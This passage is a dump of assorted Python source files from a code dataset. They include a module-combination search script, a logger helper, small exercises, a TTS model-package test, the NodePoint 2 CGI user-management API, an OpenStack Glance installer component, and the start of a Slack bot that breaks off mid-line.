+{"seq_id":"565938130","text":"# coding:utf-8\nfrom random import choice\nimport copy\ntest_data = [\n [\n [0.6773, 1.25, 0.3],\n [0.6773, 1.54, 0.3],\n [1.8425, 2.55, 1.5],\n ], # 模块A\n [\n [3.3447, 1.5, 3],\n [1.4391, 1, 4]\n ], # 模块B\n [\n [2.8325, 4, 8],\n [2.2007, 3, 16],\n [3.4007, 6, 8]\n ], # 模块C\n [\n [1.1284, 1.55, 0.5],\n [0.5602, 0.96, 3],\n [0.3708, 1.24, 2.5]\n ], # M4\n [\n [2.9667, 5, 8],\n [2.2515, 5, 6],\n [2.2515, 3, 8],\n [2.9667, 7, 10]\n ], # M5\n [\n [1.1014, 0.78, 1],\n [2.7796, 1.25, 1.2]\n ], # M6\n [\n [1.7829, 2, 8],\n [3.6429, 4, 6],\n [5.4821, 6, 6]\n ] # M7\n]\n'''\n 增加标志位 判断个体是否已经评价过\n'''\n\n\ndef add_flag(data):\n for module in data:\n for item in module:\n item.append(0)\n print(module)\n\n\npopulation = []\n\n\nclass GA:\n def __init__(self):\n pass\n\n '''\n 种群随机初始化\n '''\n\n @staticmethod\n def random_init(data):\n for module in data:\n individual = choice(module)\n population.append(individual)\n\n\nclass Individual:\n def __init__(self, score, cost, _time):\n self.expert_score = score # [0,1]\n self.cost = cost # [1,100]\n self.setup_time = _time\n\n def encode(self):\n print(bin(self.cost))\n\n\ndef test():\n individual = Individual(0.5, 50, 20)\n individual.encode()\n\ndef calculate_cost(individual):\n res = 0.0\n for elem in individual:\n res += elem[1]\n return res\n\ndef calculate_time(individual):\n res = 0.0\n for elem in individual:\n res += elem[2]\n return res\n\ndef calculate_performance(individual):\n res = 0.0\n for elem in individual:\n res += elem[0]\n return res\n\nif __name__ == '__main__':\n # add_flag(test_data)\n # GA.random_init(test_data)\n best_set = []\n best_individual = []\n current_individual = []\n count = 0\n for module in test_data:\n current_individual.append([])\n best_individual.append(module[0])\n count = 0\n for a in test_data[0]:\n current_individual[0] = a\n for b in test_data[1]:\n current_individual[1] = b\n for c in test_data[2]:\n current_individual[2] = c\n for d in test_data[3]:\n current_individual[3] = d\n for e in test_data[4]:\n current_individual[4] = e\n for f in test_data[5]:\n current_individual[5] = f\n for g in test_data[6]:\n current_individual[6] = g\n cur_cost = calculate_cost(current_individual)\n cur_time = calculate_time(current_individual)\n cur_performance = calculate_performance(current_individual)\n best_performance = calculate_performance(best_individual)\n if cur_cost < 20 and cur_time < 32 and cur_performance > best_performance:\n best_individual = copy.deepcopy(current_individual)\n best_set.append([best_individual, cur_performance])\n if cur_cost > 20 and cur_time > 32:\n print(\"不合格\")\n\n print(str(count)+\": \"+str(cur_performance) + \" \" +\n str(cur_cost) + \" \" + str(cur_time) +\n \" best:--\" + str(best_performance))\n count += 1\n print(best_individual)\n print(calculate_performance(best_individual))\n print(calculate_cost(best_individual))\n print(calculate_time(best_individual))\n print(\"--------best set---------\")\n for i, best in enumerate(best_set):\n print(\"-----第\"+str(i+1)+\"代-------\")\n print(\"最优组合方案:\" + str(best[0]))\n print(\"性能:\" + str(best[1]))\n print(\"\\n\")\n\n\n","sub_path":"tests/qwsci/GA.py","file_name":"GA.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"547705226","text":"import logging\n\nclass LoggerHelper(object):\n _i = None\n @classmethod\n def instance(cls):\n if cls._i:\n return cls._i\n else:\n cls._i = LoggerHelper()\n return cls._i\n\n def __init__(self):\n error_log = logging.FileHandler('error.log', 'a+', encoding='utf-8')\n fmt = logging.Formatter(fmt=\"%(asctime)s - %(name)s - %(levelname)s -%(module)s: %(message)s\")\n error_log.setFormatter(fmt)\n # 创建日志对象\n error_logger = logging.Logger('error', level=logging.ERROR)\n # 日志对象和文件对象创建关系\n error_logger.addHandler(error_log)\n self.error_logger = error_logger\n\n run_log = logging.FileHandler('run.log', 'a+', encoding='utf-8')\n fmt = logging.Formatter(fmt=\"%(asctime)s - %(name)s - %(levelname)s -%(module)s: %(message)s\")\n run_log.setFormatter(fmt)\n # 创建日志对象\n run_logger = logging.Logger('run', level=logging.ERROR)\n # 日志对象和文件对象创建关系\n run_logger.addHandler(run_log)\n self.run_logger = run_logger\n# if __name__ == '__main__':\n#\n# # 单例模式,用户获得永远是第一次创建的对象\n# ##内部只会运行一次\n# obj1 = LoggerHelper.instance()\n# obj1.run_logger.log(logging.FATAL,'asdfasdfasdfasdf')\n#\n# obj2 = LoggerHelper.instance()\n# obj2.run_logger.log(logging.FATAL,'asdfasdfasdfasdf')\n#\n# obj3 = LoggerHelper.instance()\n# obj3.run_logger.log(logging.FATAL,'asdfasdfasdfasdf')","sub_path":"CMDB/Client/config/logger_helper.py","file_name":"logger_helper.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"232370085","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 20 19:18:13 2019\r\n\r\n@author: PRASHANT\r\n\"\"\"\r\n\r\ns=int(input(\"enter the number of key value pairs\"))\r\nd={}\r\nfor i in range(s):\r\n key=input(\"enter a string\")\r\n value=[]\r\n for j in key:\r\n if j in \"aeiouAEIOU\":\r\n value.append(j)\r\n d.update({key:value})\r\nprint(d)\r\n","sub_path":"dict update.py","file_name":"dict update.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"63293829","text":"# Your code goes here.\n# hcat\n#head(X,5)\nFX = hcat(data, actors, directors, genres,'revenue_(millions)')\nhead(FX,5)\nFX = clean(FX)\nFY = FX['revenue_(millions)']\nFX = exclude(X, ['revenue_(millions)','metascore'])\n# remove columns\n# scale\nFmodel = LinearModel(scale = True)\n# model\nFmodel.fit(FX, FY)\nFpredictions = Fmodel.predict(FX)\n #print(Fpredictions[0:10])\n# plot\nFmodel.plot(Fpredictions, FY)\n# coefficients\nFmodel.coefficients(plot = True, top = 50)\n\n# analyse\n#highest\nFmodel.analyse(plot = True, column = 'director_(J.J.Abrams)')\n#loest\nFmodel.analyse(plot = True, column = 'director_(ChristopherNolan)')\n# Then, recommendations to studios\n#I recommend ChristopherNolan to be a directors, because it is obviously to see that, \n#if ChristopherNolan didn't direct movies, the REDUCE the overall mean score \n# by 237.04 millions!!! so he is the person who can make the movie make highest benefit.","sub_path":"5826/lab/week4/w4.py","file_name":"w4.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"52440878","text":"from random import randint\n\n\nclass House:\n def __init__(self, area, price, sale, sum_sale):\n self.area = area\n self.price = price\n self.sale = sale\n self.sum_sale = sum_sale\n\n def info_about_house(self):\n print(f\"House is {self.area} square metres and its price {self.price}.\")\n\n def sale_for_home(self):\n self.sale = randint(1, 15)\n self.sum_sale = self.price / 100 * self.sale\n print(f\"This is the discount amount : {self.sum_sale}\")\n\n def price_ws(self):\n price_with_sale = self.price - self.sum_sale\n print(f\"This is the amount of the house with a discount : {price_with_sale}\")\n\n\nclass Human:\n def __init__(self, age, name, money, house_owning):\n self.age = age\n self.name = name\n self.money = money\n self.house_owning = house_owning\n\n def working(self):\n if self.money <= 0:\n print(self.money)\n else:\n if self.money >= 1:\n while self.money <= 1000000:\n self.money *= 10\n print(self.money)\n\n def bye_my_house(self):\n if B.price < self.money:\n self.house_owning = \"have \"\n print(\"Congratulations, you have bought your own house\")\n else:\n return \"Sorry , you don't have enough money\"\n\n def say_about_me(self):\n print(f\"Hello! My name is {self.name} and I am {self.age} years. I {self.house_owning} house.\")\n\n\nB = House(50, 850000, 0, 0)\nH = Human(30, \"Ruslan\", 1, \"don't have\")\nB.info_about_house()\nB.sale_for_home()\nB.price_ws()\nH.working()\nH.bye_my_house()\nH.say_about_me()","sub_path":"homeworks/HW#3_OOP_Practice/Homework#3.py","file_name":"Homework#3.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"479051886","text":"import os\nimport tempfile\nimport unittest\nfrom pathlib import Path\n\nimport torch\nfrom torch.optim.adam import Adam\n\nfrom model.gan import GAN\nfrom model.io import ModelPackage\nfrom model.tacotron_new import Tacotron\nfrom utils.config import Config\n\n\nclass TestModelPackage(unittest.TestCase):\n\n def setUp(self) -> None:\n self.tmp_dir = tempfile.TemporaryDirectory(prefix='TestModelPackage')\n current_dir = os.path.dirname(os.path.abspath(__file__))\n current_dir = Path(current_dir)\n self.config_path = current_dir/'resources'/'test_config.yaml'\n\n def tearDown(self) -> None:\n self.tmp_dir.cleanup()\n\n def test_save_load(self) -> None:\n tmp_dir = Path(self.tmp_dir.name)\n cfg = Config.load(self.config_path)\n tacotron = Tacotron.from_config(cfg)\n taco_opti = Adam(tacotron.parameters(), lr=2e-5)\n gan = GAN.from_config(cfg)\n gen_opti = Adam(gan.generator.parameters(), lr=3e-5)\n disc_opti = Adam(gan.discriminator.parameters())\n model_package = ModelPackage(\n tacotron=tacotron, gan=gan, taco_opti=taco_opti,\n gen_opti=gen_opti, disc_opti=disc_opti, cfg=cfg)\n model_package.save(tmp_dir/'model.zip')\n\n m = ModelPackage.load(tmp_dir/'model.zip')\n self._assert_equal_models(m.tacotron, tacotron)\n self._assert_equal_models(m.gan, gan)\n for param_group in m.taco_opti.param_groups:\n self.assertAlmostEqual(2e-5, param_group['lr'], places=10)\n self.assertEqual('english_cleaners', m.cfg.cleaners)\n\n @staticmethod\n def _assert_equal_models(model_1, model_2):\n items_1 = model_1.state_dict().items()\n items_2 = model_2.state_dict().items()\n for key_item_1, key_item_2 in zip(items_1, items_2):\n if not torch.equal(key_item_1[1], key_item_2[1]):\n raise ValueError\n","sub_path":"tests/test_model_package.py","file_name":"test_model_package.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"490761783","text":"#!/usr/bin/env python3\n# NodePoint 2 - (C) 2017 Patrick Lambert - http://nodepoint.ca\n\nimport cgitb\nimport connix\nimport json\nimport os\nimport datetime\nimport users\nimport misc\n\n#\n# Initialization\n#\n__VERSION__ = \"2.0.0-alpha1\"\nprint(connix.header(\"application/javascript\"))\nq = connix.form()\ncgitb.enable(context=1, format=\"text\")\ncfg = connix.load(os.path.join(\"..\", \"..\", \"data\", \"config.json\"))\nstrings = connix.load(os.path.join(\"..\", \"..\", \"texts\", \"strings.json\"))\nerrors = connix.load(os.path.join(\"..\", \"..\", \"texts\", \"errors.json\"))\nmisc.init()\nusers.init()\nuser = None\n\ndef out(output):\n\tmisc.log(user, q['cmd'].lower(), 0, errors[cfg['lang']]['OK'])\n\tprint(json.dumps(output, sort_keys = False, indent = 4))\n\tquit(0)\n\ndef err(e):\n\tif e != \"ERR_INVALID_CMD\":\n\t\tmisc.log(user, q['cmd'].lower(), 1, errors[cfg['lang']][e])\n\toutput = {'status': 1, 'code': e, 'message': errors[cfg['lang']][e]}\n\tprint(json.dumps(output, sort_keys = False, indent = 4))\n\tquit(1)\n\ndef ok():\n\treturn {'status': 0, 'code': \"OK\", 'message': errors[cfg['lang']]['OK']}\n\nif \"cmd\" not in q:\n\terr(\"ERR_INVALID_CMD\")\n\nif \"authkey\" in q:\n\tuser = users.auth_user(q['authkey'])\n\tif not user:\n\t\terr(\"ERR_INVALID_AUTHKEY\")\n\n#\n# Command processing\n#\nif q['cmd'].lower() == \"status\": # Display the status of the server\n\toutput = ok()\n\toutput['version'] = __VERSION__\n\toutput['platform'] = os.uname()\n\toutput['pid'] = os.getpid()\n\toutput['path'] = os.path.realpath(__file__)\n\toutput['config'] = cfg\n\tout(output)\n\nelif q['cmd'].lower() == \"add_user\": # Add a new user\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:add_user\" not in user['perms'] and \"users:*\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"username\" not in q or \"password\" not in q or \"fullname\" not in q or \"email\" not in q:\n\t\terr(\"ERR_MISSING_FIELDS\")\n\telif \"@\" not in q['email'] or \".\" not in q['email'] or len(q['email']) < 3 or len(q['email']) > 255:\n\t\terr(\"ERR_MISFORMED_EMAIL\")\n\telif len(q['username']) < 3 or len(q['username']) > 255 or connix.alphanum(q['username']) != q['username']:\n\t\terr(\"ERR_MISFORMED_USERNAME\")\n\telse:\n\t\toutput = ok()\n\t\toutput['userid'] = users.add_user(connix.alphanum(q['username']), q['password'], q['fullname'], q['email'])\n\t\tif not output['userid']:\n\t\t\terr(\"ERR_USER_CREATION\")\n\t\tout(output)\n\nelif q['cmd'].lower() == \"add_group\": # Add a new group\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:add_group\" not in user['perms'] and \"users:*\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"groupname\" not in q or \"perms\" not in q:\n\t\terr(\"ERR_MISSING_FIELDS\")\n\telif len(q['groupname']) < 3 or len(q['groupname']) > 255 or connix.alphanum(q['groupname'], spaces=True) != q['groupname']:\n\t\terr(\"ERR_MISFORMED_GROUPNAME\")\n\telse:\n\t\toutput = ok()\n\t\toutput['groupid'] = users.add_group(connix.alphanum(q['groupname']), q['perms'])\n\t\tif not output['groupid']:\n\t\t\terr(\"ERR_GROUP_CREATION\")\n\t\tout(output)\n\nelif q['cmd'].lower() == \"ban_user\": # Ban a user\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:ban_user\" not in user['perms'] and \"users:*\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"userid\" not in q or \"minutes\" not in q:\n\t\terr(\"ERR_MISSING_FIELDS\")\n\telif not connix.is_int(q['minutes']) or int(q['minutes']) < 0 or int(q['minutes']) > 5256000:\n\t\terr(\"ERR_INVALID_MINUTES\")\n\telse:\n\t\toutput = ok()\n\t\tusers.set_attr(q['userid'], \"_banned\", int(int(q['minutes'])*60+connix.unixtime()))\n\t\tout(output)\n\nelif q['cmd'].lower() == \"mod_user\": # Modify a user\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:mod_user\" not in user['perms'] and \"users:*\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"userid\" not in q:\n\t\terr(\"ERR_MISSING_FIELDS\")\n\telse:\n\t\temail = None\n\t\tfullname = None\n\t\tusername = None\n\t\tif \"email\" in q:\n\t\t\tif \"@\" not in q['email'] or \".\" not in q['email'] or len(q['email']) < 3 or len(q['email']) > 255:\n\t\t\t\terr(\"ERR_MISFORMED_EMAIL\")\n\t\t\telse:\n\t\t\t\temail = q['email']\n\t\tif \"username\" in q:\n\t\t\tif len(q['username']) < 3 or len(q['username']) > 255 or connix.alphanum(q['username']) != q['username']:\n\t\t\t\terr(\"ERR_MISFORMED_USERNAME\")\n\t\t\telse:\n\t\t\t\tusername = q['username']\n\t\tif \"fullname\" in q:\n\t\t\tfullname = q['fullname']\n\t\toutput = ok()\n\t\tusers.mod_user(q['userid'], username, fullname, email)\n\t\tout(output)\n\nelif q['cmd'].lower() == \"mod_group\": # Modify a group\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:mod_group\" not in user['perms'] and \"users:*\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"groupid\" not in q:\n\t\terr(\"ERR_MISSING_FIELDS\")\n\telse:\n\t\tgroupname = None\n\t\tperms = None\n\t\tif \"groupname\" in q:\n\t\t\tif len(q['groupname']) < 3 or len(q['groupname']) > 255 or connix.alphanum(q['groupname'], spaces=True) != q['groupname']:\n\t\t\t\terr(\"ERR_MISFORMED_GROUPNAME\")\n\t\t\telse:\n\t\t\t\tgroupname = q['groupname']\n\t\tif \"perms\" in q:\n\t\t\tperms = q['perms']\n\t\toutput = ok()\n\t\tusers.mod_group(q['groupid'], groupname, perms)\n\t\tout(output)\n\nelif q['cmd'].lower() == \"show_log\": # Show log entries\n\toutput = ok()\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"misc:show_log\" not in user['perms'] and \"misc:*\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telse:\n\t\toutput['log'] = misc.show_log()\n\t\tout(output)\n\nelif q['cmd'].lower() == \"login\": # Login as a user\n\toutput = ok()\n\tif \"username\" not in q or \"password\" not in q:\n\t\terr(\"ERR_MISSING_CREDENTIALS\")\n\tif cfg['auth'] == \"simple\":\n\t\tauthkey = users.login(q['username'], q['password'])\n\t\tif authkey:\n\t\t\tuser = users.user_info(username=q['username'])\n\t\t\tbanned = users.get_attr(user['userid'], \"_banned\")\n\t\t\tif banned and int(banned) > connix.unixtime():\n\t\t\t\terr(\"ERR_USER_BANNED\")\n\t\t\toutput['authkey'] = authkey\n\t\t\toutput['valid_until'] = datetime.datetime.utcfromtimestamp(connix.unixtime()+cfg['authkey_expiry']*60*60).isoformat()\n\t\t\toutput['valid_for'] = connix.remote_ip()\n\t\t\toutput['user'] = user\n\t\t\tout(output)\n\t\telse:\n\t\t\terr(\"ERR_INVALID_CREDENTIALS\")\n\nelif q['cmd'].lower() == \"texts\": # Retrieve all strings\n\toutput = ok()\n\toutput['errors'] = errors[cfg['lang']]\n\toutput['strings'] = strings[cfg['lang']]\n\tout(output)\n\nelif q['cmd'].lower() == \"user_info\": # Retrieve a user's information\n\toutput = ok()\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"username\" not in q and \"userid\" not in q:\n\t\toutput['user'] = user\n\t\tout(output)\n\telif \"users:*\" not in user['perms'] and \"users:user_info\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"userid\" not in q:\n\t\toutput['user'] = users.user_info(username=q['username'])\n\t\tif not output['user']:\n\t\t\terr(\"ERR_INVALID_USER\")\n\t\telse:\n\t\t\tout(output)\n\telse:\n\t\toutput['user'] = users.user_info(userid=q['userid'])\n\t\tif not output['user']:\n\t\t\terr(\"ERR_INVALID_USER\")\n\t\telse:\n\t\t\tout(output)\n\nelif q['cmd'].lower() == \"list_users\": # List existing users\n\toutput = ok()\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:*\" not in user['perms'] and \"users:list_users\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telse:\n\t\toutput['users'] = users.list_users()\n\t\tout(output)\n\nelif q['cmd'].lower() == \"list_groups\": # List existing groups\n\toutput = ok()\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:*\" not in user['perms'] and \"users:list_groups\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telse:\n\t\toutput['groups'] = users.list_groups()\n\t\tout(output)\n\nelif q['cmd'].lower() == \"help\": # Show available commands\n\toutput = ok()\n\toutput['commands'] = {\n\t\t\"user_info\": [\"username\", \"userid\"],\n\t\t\"texts\": [],\n\t\t\"login\": [\"username\", \"password\"],\n\t\t\"status\": [],\n\t\t\"list_users\": [],\n\t\t\"list_groups\": [],\n\t\t\"ban_user\": [\"userid\", \"minutes\"],\n\t\t\"add_user\": [\"username\", \"password\", \"fullname\", \"email\"],\n\t\t\"add_group\": [\"groupname\", \"perms\"],\n\t\t\"show_log\": []\n\t}\n\toutput['options'] = [\"authkey\"]\n\tout(output)\n\nelse:\n\terr(\"ERR_INVALID_CMD\")\n\nquit(0)\n","sub_path":"www/api/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":7755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"57943031","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport io\n\nfrom anvil import cfg\nfrom anvil import component as comp\nfrom anvil import log as logging\nfrom anvil import shell as sh\n\nfrom anvil.helpers import db as dbhelper\nfrom anvil.helpers import glance as ghelper\nfrom anvil.helpers import keystone as khelper\n\nLOG = logging.getLogger(__name__)\n\n# Config files/sections\nAPI_CONF = \"glance-api.conf\"\nREG_CONF = \"glance-registry.conf\"\nAPI_PASTE_CONF = 'glance-api-paste.ini'\nREG_PASTE_CONF = 'glance-registry-paste.ini'\nLOGGING_CONF = \"logging.conf\"\nLOGGING_SOURCE_FN = 'logging.cnf.sample'\nPOLICY_JSON = 'policy.json'\nCONFIGS = [API_CONF, REG_CONF, API_PASTE_CONF,\n REG_PASTE_CONF, POLICY_JSON, LOGGING_CONF]\n\n# Reg, api, scrub are here as possible subsystems\nGAPI = \"api\"\nGREG = \"reg\"\nGSCR = 'scrub'\n\n# This db will be dropped and created\nDB_NAME = \"glance\"\n\n# What applications to start\nAPP_OPTIONS = {\n 'glance-api': ['--config-file', sh.joinpths('%CONFIG_DIR%', API_CONF)],\n 'glance-registry': ['--config-file', sh.joinpths('%CONFIG_DIR%', REG_CONF)],\n 'glance-scrubber': ['--config-file', sh.joinpths('%CONFIG_DIR%', REG_CONF)],\n}\n\n# How the subcompoent small name translates to an actual app\nSUB_TO_APP = {\n GAPI: 'glance-api',\n GREG: 'glance-registry',\n GSCR: 'glance-scrubber',\n}\n\n# Subdirs of the downloaded (we are overriding the original)\nBIN_DIR = 'bin'\n\n\nclass GlanceMixin(object):\n\n def known_subsystems(self):\n return SUB_TO_APP.keys()\n\n def _get_config_files(self):\n return list(CONFIGS)\n\n def _get_download_locations(self):\n places = list()\n places.append({\n 'uri': (\"git\", \"glance_repo\"),\n 'branch': (\"git\", \"glance_branch\"),\n })\n return places\n\n\nclass GlanceUninstaller(GlanceMixin, comp.PythonUninstallComponent):\n def __init__(self, *args, **kargs):\n comp.PythonUninstallComponent.__init__(self, *args, **kargs)\n\n\nclass GlanceInstaller(GlanceMixin, comp.PythonInstallComponent):\n def __init__(self, *args, **kargs):\n comp.PythonInstallComponent.__init__(self, *args, **kargs)\n\n def pre_install(self):\n comp.PythonInstallComponent.pre_install(self)\n if self.cfg.getboolean('glance', 'eliminate_pip_gits'):\n fn = sh.joinpths(self.get_option('app_dir'), 'tools', 'pip-requires')\n if sh.isfile(fn):\n new_lines = []\n for line in sh.load_file(fn).splitlines():\n if line.find(\"git://\") != -1:\n new_lines.append(\"# %s\" % (line))\n else:\n new_lines.append(line)\n sh.write_file(fn, \"\\n\".join(new_lines))\n\n def post_install(self):\n comp.PythonInstallComponent.post_install(self)\n self._setup_db()\n\n def _setup_db(self):\n dbhelper.drop_db(self.cfg, self.distro, DB_NAME)\n dbhelper.create_db(self.cfg, self.distro, DB_NAME, utf8=True)\n\n def _get_source_config(self, config_fn):\n real_fn = config_fn\n if config_fn == LOGGING_CONF:\n real_fn = LOGGING_SOURCE_FN\n fn = sh.joinpths(self.get_option('app_dir'), 'etc', real_fn)\n return (fn, sh.load_file(fn))\n\n def _config_adjust_registry(self, contents, fn):\n params = ghelper.get_shared_params(self.cfg)\n with io.BytesIO(contents) as stream:\n config = cfg.RewritableConfigParser()\n config.readfp(stream)\n config.set('DEFAULT', 'debug', True)\n config.set('DEFAULT', 'verbose', True)\n config.set('DEFAULT', 'bind_port', params['endpoints']['registry']['port'])\n config.set('DEFAULT', 'sql_connection',\n dbhelper.fetch_dbdsn(self.cfg, DB_NAME, utf8=True))\n config.remove_option('DEFAULT', 'log_file')\n config.set('paste_deploy', 'flavor', 'keystone')\n return config.stringify(fn)\n return contents\n\n def _config_adjust_paste(self, contents, fn):\n params = khelper.get_shared_params(self.cfg, 'glance')\n with io.BytesIO(contents) as stream:\n config = cfg.RewritableConfigParser()\n config.readfp(stream)\n config.set('filter:authtoken', 'auth_host', params['endpoints']['admin']['host'])\n config.set('filter:authtoken', 'auth_port', params['endpoints']['admin']['port'])\n config.set('filter:authtoken', 'auth_protocol', params['endpoints']['admin']['protocol'])\n\n config.set('filter:authtoken', 'service_host', params['endpoints']['internal']['host'])\n config.set('filter:authtoken', 'service_port', params['endpoints']['internal']['port'])\n config.set('filter:authtoken', 'service_protocol', params['endpoints']['internal']['protocol'])\n\n config.set('filter:authtoken', 'admin_tenant_name', params['service_tenant'])\n config.set('filter:authtoken', 'admin_user', params['service_user'])\n config.set('filter:authtoken', 'admin_password', params['service_password'])\n contents = config.stringify(fn)\n return contents\n\n def _config_adjust_api(self, contents, fn):\n params = ghelper.get_shared_params(self.cfg)\n with io.BytesIO(contents) as stream:\n config = cfg.RewritableConfigParser()\n config.readfp(stream)\n img_store_dir = sh.joinpths(self.get_option('component_dir'), 'images')\n config.set('DEFAULT', 'debug', True)\n config.set('DEFAULT', 'verbose', True)\n config.set('DEFAULT', 'default_store', 'file')\n config.set('DEFAULT', 'filesystem_store_datadir', img_store_dir)\n config.set('DEFAULT', 'bind_port', params['endpoints']['public']['port'])\n config.set('DEFAULT', 'sql_connection',\n dbhelper.fetch_dbdsn(self.cfg, DB_NAME, utf8=True))\n config.remove_option('DEFAULT', 'log_file')\n config.set('paste_deploy', 'flavor', 'keystone')\n LOG.info(\"Ensuring file system store directory %r exists and is empty.\" % (img_store_dir))\n sh.deldir(img_store_dir)\n self.tracewriter.dirs_made(*sh.mkdirslist(img_store_dir))\n return config.stringify(fn)\n\n def _config_adjust_logging(self, contents, fn):\n with io.BytesIO(contents) as stream:\n config = cfg.RewritableConfigParser()\n config.readfp(stream)\n config.set('logger_root', 'level', 'DEBUG')\n config.set('logger_root', 'handlers', \"devel,production\")\n contents = config.stringify(fn)\n return contents\n\n def _config_param_replace(self, config_fn, contents, parameters):\n if config_fn in [REG_CONF, REG_PASTE_CONF, API_CONF, API_PASTE_CONF, LOGGING_CONF]:\n # We handle these ourselves\n return contents\n else:\n return comp.PythonInstallComponent._config_param_replace(self, config_fn, contents, parameters)\n\n def _config_adjust(self, contents, name):\n if name == REG_CONF:\n return self._config_adjust_registry(contents, name)\n elif name == REG_PASTE_CONF:\n return self._config_adjust_paste(contents, name)\n elif name == API_CONF:\n return self._config_adjust_api(contents, name)\n elif name == API_PASTE_CONF:\n return self._config_adjust_paste(contents, name)\n elif name == LOGGING_CONF:\n return self._config_adjust_logging(contents, name)\n else:\n return contents\n\n\nclass GlanceRuntime(GlanceMixin, comp.PythonRuntime):\n def __init__(self, *args, **kargs):\n comp.PythonRuntime.__init__(self, *args, **kargs)\n self.bin_dir = sh.joinpths(self.get_option('app_dir'), BIN_DIR)\n self.wait_time = max(self.cfg.getint('DEFAULT', 'service_wait_seconds'), 1)\n self.do_upload = self.get_option('load-images')\n\n def _get_apps_to_start(self):\n apps = list()\n for name, values in self.subsystems.items():\n if name in SUB_TO_APP:\n subsys = name\n apps.append({\n 'name': SUB_TO_APP[subsys],\n 'path': sh.joinpths(self.bin_dir, SUB_TO_APP[subsys]),\n # This seems needed, to allow for the db syncs to not conflict... (arg)\n 'sleep_time': 5,\n })\n return apps\n\n def _get_app_options(self, app):\n return APP_OPTIONS.get(app)\n\n def _get_image_urls(self):\n uris = self.cfg.getdefaulted('glance', 'image_urls', '').split(\",\")\n return [u.strip() for u in uris if len(u.strip())]\n\n def post_start(self):\n comp.PythonRuntime.post_start(self)\n if self.do_upload:\n # Install any images that need activating...\n LOG.info(\"Waiting %s seconds so that glance can start up before image install.\" % (self.wait_time))\n sh.sleep(self.wait_time)\n params = {}\n params['glance'] = ghelper.get_shared_params(self.cfg)\n params['keystone'] = khelper.get_shared_params(self.cfg, 'glance')\n ghelper.UploadService(params).install(self._get_image_urls())\n","sub_path":"anvil/components/glance.py","file_name":"glance.py","file_ext":"py","file_size_in_byte":9853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"478095515","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport logging\n\nfrom slackclient import SlackClient\n\nfrom nemesis.bot import bot_messages\nfrom nemesis.common.config import options\nfrom nemesis.models.models import UserSlack\nfrom nemesis.models.models import UserStatusReport\n\n\nclass SlackClientNemesis(object):\n\n def get_bot_info(self):\n bot_info = self.slack_client.api_call(\"auth.test\")\n if 'ok' in bot_info and bot_info['ok'] is True:\n return bot_info['user_id']\n return None\n\n def get_channel_info(self, channel):\n return self.slack_client.api_call(\"channels.info\", channel=channel)\n\n def post_message(self, channel, text):\n self.slack_client.api_call(\"chat.postMessage\", channel=channel, text=text, as_user=True)\n\n def get_user_info(self, user):\n user = self.slack_client.api_call(\"users.info\", user=user)['user']\n return {\n 'slack_id': user['id'],\n 'username': user['name'],\n 'avatar': user['profile']['image_192'],\n 'realname': user['real_name']\n }\n\n\nclass Nemesis(SlackClientNemesis):\n\n def __init__(self):\n self.token = options.slack_token_bot_slack\n self.slack_client = SlackClient(self.token)\n self.bot_id = self.get_bot_info()\n\n def read(self):\n self.slack_connect()\n\n def slack_connect(self):\n if self.slack_client.rtm_connect():\n print('Connected to Nemesis bot')\n logging.info('Connected to Nemesis bot')\n while True:\n try:\n for event in self.slack_client.rtm_read():\n logging.debug(event)\n event_type = self.get_event_type(event)\n if event_type == 'user_login' and 